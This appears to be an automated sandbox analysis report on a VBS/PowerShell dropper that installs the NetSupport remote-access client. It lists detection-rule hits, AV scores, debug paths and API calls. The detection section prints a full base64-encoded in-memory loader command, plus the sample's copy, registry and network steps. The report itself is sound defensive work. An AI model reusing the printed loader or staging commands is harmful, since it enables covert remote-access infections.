"C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" , ProcessId: 2216, ProcessName: wscript.exe
                                Sigma detected: Suspicious Script Execution From Temp Folder
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc JABBAHEAdwB3AHMAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABHAHkAaQBlAHAAZwBrAHcAdgByACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQAQQBxAHcAdwBzAGMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAeQBpAGUAcABnAGsAdwB2AHIALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEkAdwBxAGIAdwBjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAIAApADsAJABFAG0AYgBtAGUAcwBqAHMAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAUgB3AHAAdQB4AHcAYQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABJAHcAcQBiAHcAYwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbwBwAHkAVABvACgAIAAkAEUAbQBiAG0AZQBzAGoAcwBsACAAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbABvAHMAZQAoACkAOwAkAEkAdwBxAGIAdwBjAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgACQARQBtAGIAbQBlAHMAagBzAGwALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFgAcwBsAG0AdwBtAG8AcQBnAGsAegApADsAIAAkAE4AZgBrAGYAZwB0AHQAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABoAHIAZQBhAGQAaQBuAGcALgBUAGgAcgBlAGEAZABdADoAOgBHAGUAdABEAG8AbQBhAGkAbgAoACkALgBMAG8AYQBkACgAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAKQA7ACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0AIAA9ACAAJABOAGYAawBmAGcAdAB0AHIALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEEAdgBmAG4AeAB1AGsAbgByAG0AbQAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=, ParentImage: C:\Users\user\Desktop\Pyyidau.vbs.exe, ParentProcessId: 5876, ParentProcessName: Pyyidau.vbs.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" , ProcessId: 2216, ProcessName: wscript.exe
                                Sigma detected: WScript or CScript Dropper
                                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5032, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs", ProcessId: 6228, ProcessName: wscript.exe
                                Sigma detected: CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: Client32Provider, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe, ProcessId: 3360, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{71C5A887-11E0-4c5a-9B9B-D4A074555692}\(Default)
                                Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
                                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\Pyyidau.vbs.exe, ProcessId: 5876, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oglvszav.vxt.ps1
                                Sigma detected: Script Initiated Connection
                                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 176.126.113.166, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 2216, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49742
                                Sigma detected: Suspicious Copy From or To System Directory
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Pyyidau.vbs.exe" /Y, CommandLine: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Pyyidau.vbs.exe" /Y, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 8368, ProcessCommandLine: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Pyyidau.vbs.exe" /Y, ProcessId: 6588, ProcessName: cmd.exe
                                Sigma detected: Suspicious Execution From GUID Like Folder Names
                                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: cmd.exe /c ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic", CommandLine: cmd.exe /c ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\msiexec.exe /V, ParentImage: C:\Windows\System32\msiexec.exe, ParentProcessId: 8432, ParentProcessName: msiexec.exe, ProcessCommandLine: cmd.exe /c ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic", ProcessId: 8936, ProcessName: cmd.exe
                                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5032, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs", ProcessId: 6228, ProcessName: wscript.exe
                                Sigma detected: Windows Processes Suspicious Parent Directory
                                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 868, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv, ProcessId: 3652, ProcessName: svchost.exe

                                Suricata Signatures

                                No Suricata rule has matched

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Multi AV Scanner detection for domain / URL
                                Source: http://pesterbdd.com/images/Pester.png4Virustotal: Detection: 10%Perma Link
                                Multi AV Scanner detection for submitted file
                                Source: Pyyidau.vbsReversingLabs: Detection: 15%
                                Source: Pyyidau.vbsVirustotal: Detection: 25%Perma Link
                                Source: C:\Windows\Installer\MSI1387.tmpFile created: C:\Windows\setupact.log
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: C:\Program Files (x86)\NetSupport\NetSupport Manager\MSVCR100.dll
                                Source: unknownHTTPS traffic detected: 176.126.113.166:443 -> 192.168.11.20:49742 version: TLS 1.2
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410f\ctl32\release_unicode\tcctl32.pdbP source: client32.exe, 00000020.00000002.115186233551.000000006C977000.00000002.00000001.01000000.0000001C.sdmp
                                Source: Binary string: sfxcab.pdb source: Pyyidau.vbs.exe, 00000004.00000002.113968442877.000000000A0DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.113930238948.0000000001002000.00000040.00000400.00020000.00000000.sdmp
                                Source: Binary string: D:\NSLBuilds\NSM\NSM14Trunk\licgen\Release_unicode\Licence.pdb source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\NSLBuilds\NSM\NSM14Trunk\licgen\x64\Release\CloseHookApp64.pdb source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410f\ctl32\release_unicode\PCICTL.pdb source: pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Pyyidau.vbs.exe, 00000004.00000002.113967583372.0000000009590000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdb source: wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, MSIF373.tmp, 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp, MSIF373.tmp, 00000019.00000000.114135501778.0000000000619000.00000002.00000001.01000000.0000000C.sdmp, MSIF985.tmp, 0000001B.00000002.114157054506.0000000000959000.00000002.00000001.01000000.0000000D.sdmp, MSIF985.tmp, 0000001B.00000000.114151145405.0000000000959000.00000002.00000001.01000000.0000000D.sdmp, MSI1387.tmp, 0000001D.00000000.114217635476.0000000001029000.00000002.00000001.01000000.0000000F.sdmp, MSI1387.tmp, 0000001D.00000002.114241895385.0000000001029000.00000002.00000001.01000000.0000000F.sdmp, MSI23E6.tmp, 0000001F.00000002.114270824312.0000000000BD9000.00000002.00000001.01000000.00000014.sdmp, MSI23E6.tmp, 0000001F.00000000.114259441382.0000000000BD9000.00000002.00000001.01000000.00000014.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\x64\release_unicode\winst64.pdb source: winst64.exe, 0000001E.00000000.114225718112.00007FF679386000.00000002.00000001.01000000.00000010.sdmp, winst64.exe, 0000001E.00000002.114227744042.00007FF679386000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdbpJD source: wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: c:\nsmsrc\nsm1201f\kbfiltr\sys\objfre_wnet_amd64\amd64\nskbfltr.pdb source: winst64.exe, 0000001E.00000003.114226774436.00000000010E6000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wntdll.pdbUGP source: client32.exe, 00000021.00000002.115183991198.0000000006BF0000.00000040.10000000.00040000.00000000.sdmp, pcicfgui_client.exe, 00000022.00000002.114282443624.0000000002DF0000.00000020.00001000.00020000.00000000.sdmp
                                Source: Binary string: D:\nsmsrc\ReProcessWindowshortcuts\Release\ReProcessWindowshortcuts.pdb source: wscript.exe, 00000006.00000003.114046703873.000000000B53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Pyyidau.vbs.exe, 00000004.00000002.113967583372.0000000009590000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: wntdll.pdb source: client32.exe, 00000021.00000002.115183991198.0000000006BF0000.00000040.10000000.00040000.00000000.sdmp, pcicfgui_client.exe, 00000022.00000002.114282443624.0000000002DF0000.00000020.00001000.00020000.00000000.sdmp
                                Source: Binary string: protobuf-net.pdbSHA256}Lq source: Pyyidau.vbs.exe, 00000004.00000002.113967321914.0000000009530000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 00000020.00000002.115176196956.00000000001F2000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000020.00000000.114260013532.00000000001F2000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000021.00000002.115175806998.00000000001F2000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000021.00000000.114272266016.00000000001F2000.00000002.00000001.01000000.00000015.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdbpcD source: MSIF373.tmp, 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp, MSIF373.tmp, 00000019.00000000.114135501778.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\pcihtmlgen\Release_unicode\PCIHTMLGen.pdb source: PCIhtmlgen.dll.20.dr
                                Source: Binary string: protobuf-net.pdb source: Pyyidau.vbs.exe, 00000004.00000002.113967321914.0000000009530000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410f\ctl32\release_unicode\tcctl32.pdb source: client32.exe, 00000020.00000002.115186233551.000000006C977000.00000002.00000001.01000000.0000001C.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdbp source: MSIF985.tmp, 0000001B.00000002.114157054506.0000000000959000.00000002.00000001.01000000.0000000D.sdmp, MSIF985.tmp, 0000001B.00000000.114151145405.0000000000959000.00000002.00000001.01000000.0000000D.sdmp, MSI1387.tmp, 0000001D.00000000.114217635476.0000000001029000.00000002.00000001.01000000.0000000F.sdmp, MSI1387.tmp, 0000001D.00000002.114241895385.0000000001029000.00000002.00000001.01000000.0000000F.sdmp, MSI23E6.tmp, 0000001F.00000002.114270824312.0000000000BD9000.00000002.00000001.01000000.00000014.sdmp, MSI23E6.tmp, 0000001F.00000000.114259441382.0000000000BD9000.00000002.00000001.01000000.00000014.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\ctl32\release_unicode\htctl32.pdb source: client32.exe, 00000020.00000002.115185392651.000000006C888000.00000002.00000001.01000000.0000001E.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\ctl32\Release_unicode\PCICFGUI.pdb source: pcicfgui_client.exe, 00000022.00000002.114281184741.0000000000DF2000.00000002.00000001.01000000.00000020.sdmp, pcicfgui_client.exe, 00000022.00000000.114273328544.0000000000DF2000.00000002.00000001.01000000.00000020.sdmp, pcicfgui_client.exe, 00000023.00000002.114274483585.0000000000DF2000.00000002.00000001.01000000.00000020.sdmp
                                Source: Binary string: msvcp100.i386.pdb source: client32.exe, 00000020.00000002.115191046027.000000006FDF1000.00000020.00000001.01000000.00000018.sdmp, client32.exe, 00000021.00000002.115191046071.000000006FDF1000.00000020.00000001.01000000.00000018.sdmp, pcicfgui_client.exe, 00000022.00000002.114306646393.000000006FDF1000.00000020.00000001.01000000.00000018.sdmp
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe, 00000020.00000002.115187020346.000000006CA21000.00000020.00000001.01000000.00000019.sdmp, client32.exe, 00000021.00000002.115187219936.000000006CA21000.00000020.00000001.01000000.00000019.sdmp, pcicfgui_client.exe, 00000022.00000002.114306116329.000000006CA21000.00000020.00000001.01000000.00000019.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\ctl32\release_unicode\pcichek.pdb source: client32.exe, 00000020.00000002.115191428864.00000000701B2000.00000002.00000001.01000000.0000001A.sdmp, client32.exe, 00000021.00000002.115191432453.00000000701B2000.00000002.00000001.01000000.0000001A.sdmp, pcicfgui_client.exe, 00000022.00000002.114307056768.00000000701B2000.00000002.00000001.01000000.0000001A.sdmp
                                Source: Binary string: C:\CodeBases\isdev\redist\Language Independent\i386\DllWrap.pdb source: wscript.exe, 00000006.00000003.114076941291.0000000005F10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B4B6000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: NETSUPPORT LTD.NetSupport Ltd.url.pdb.dllpreprocessing %s source: client32.exe, 00000020.00000002.115187992990.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: DisableGeolocationEnableStopClientpcicl32.pdbSSLDefCertrootcert.pemSSLCertDirRootCertsshareFilecic/setup.msicic/setup.execic/delta.zipCICshareVershareTypeInstalledBytracerecvtracesendNoAckWhenInRoomlimitcolorbitsWinHttpWiredNetworkSpeedWebSocketSSLOnlySSLDisconnectTimeoutSilentImageFilecic_lock_image.jpgImpersonateCurrentUserdetected TS feature source: client32.exe, 00000020.00000002.115187992990.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: powershell.pdbUGP source: Pyyidau.vbs.exe, 00000004.00000000.113910844511.0000000000C51000.00000020.00000001.01000000.00000006.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release\pcihooks.pdb source: client32.exe, 00000021.00000002.115186530049.000000006C61A000.00000002.00000001.01000000.0000001F.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\cryptpak\Release\CryptPak.pdb source: client32.exe, 00000020.00000002.115186693309.000000006C9BE000.00000002.00000001.01000000.0000001B.sdmp, client32.exe, 00000021.00000002.115186891711.000000006C9BE000.00000002.00000001.01000000.0000001B.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410f\client32\release_unicode\PCICL32.pdb source: client32.exe, 00000020.00000002.115187992990.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: powershell.pdb source: Pyyidau.vbs.exe, 00000004.00000000.113910844511.0000000000C51000.00000020.00000001.01000000.00000006.sdmp
                                Source: Binary string: e:\nsmsrc\nsm\1250\1250\kbfiltr\sys\objfre_wnet_amd64\amd64\nskbfltr.pdb source: winst64.exe, 0000001E.00000003.114226626711.00000000010E6000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\ctl32\release_unicode\pcicapi.pdb source: client32.exe, 00000020.00000002.115185842993.000000006C8F5000.00000002.00000001.01000000.0000001D.sdmp
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: z:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: x:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: v:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: t:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: r:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: p:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: n:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: l:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: j:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: h:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: f:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: d:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: b:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: y:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: w:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: u:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: s:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: q:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: o:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: m:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: k:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: i:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: g:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: e:
                                Source: C:\Windows\SysWOW64\cscript.exeFile opened: c:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: a:
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005D80C0 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,ControlService,GetLastError,GetLastError,GetLastError,QueryServiceStatus,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,wsprintfW,wsprintfW,GetComputerNameW,GetCurrentDirectoryW,wsprintfW,FindFirstFileW,GetCurrentDirectoryW,DeleteFileW,FindNextFileW,FindClose,GetCurrentDirectoryW,RemoveDirectoryW,DeleteService,GetLastError,CloseServiceHandle,OpenServiceW,GetLastError,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,GetLastError,CloseServiceHandle,25_2_005D80C0
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005D4AF0 GetSystemDirectoryW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,GetModuleFileNameW,FindFirstFileW,FindClose,CopyFileW,25_2_005D4AF0
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005C0C40 FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,25_2_005C0C40
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005D55D0 FindFirstFileW,FindClose,25_2_005D55D0
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005BFD80 FindFirstFileW,CompareFileTime,FindClose,CreateDirectoryW,MoveFileW,GetLastError,CopyFileW,MoveFileW,GetLastError,25_2_005BFD80
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005DBE60 wsprintfW,GetPrivateProfileIntW,LoadStringW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,GetSystemDirectoryW,25_2_005DBE60
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005BFE18 FindFirstFileW,CompareFileTime,FindClose,CreateDirectoryW,MoveFileW,25_2_005BFE18
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_009180C0 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,ControlService,GetLastError,GetLastError,GetLastError,QueryServiceStatus,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,wsprintfW,wsprintfW,GetComputerNameW,GetCurrentDirectoryW,wsprintfW,FindFirstFileW,GetCurrentDirectoryW,DeleteFileW,FindNextFileW,FindClose,GetCurrentDirectoryW,RemoveDirectoryW,DeleteService,GetLastError,CloseServiceHandle,OpenServiceW,GetLastError,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,GetLastError,CloseServiceHandle,27_2_009180C0
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_00914AF0 GetSystemDirectoryW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,GetModuleFileNameW,FindFirstFileW,FindClose,CopyFileW,27_2_00914AF0
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_00900C40 FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,27_2_00900C40
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_009155D0 FindFirstFileW,FindClose,27_2_009155D0
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_008FFD80 FindFirstFileW,CompareFileTime,FindClose,CreateDirectoryW,MoveFileW,GetLastError,CopyFileW,MoveFileW,GetLastError,27_2_008FFD80
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_008FFE18 FindFirstFileW,CompareFileTime,FindClose,CreateDirectoryW,MoveFileW,27_2_008FFE18
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0091BE60 wsprintfW,GetPrivateProfileIntW,LoadStringW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,GetSystemDirectoryW,27_2_0091BE60
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FD0C40 FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,29_2_00FD0C40
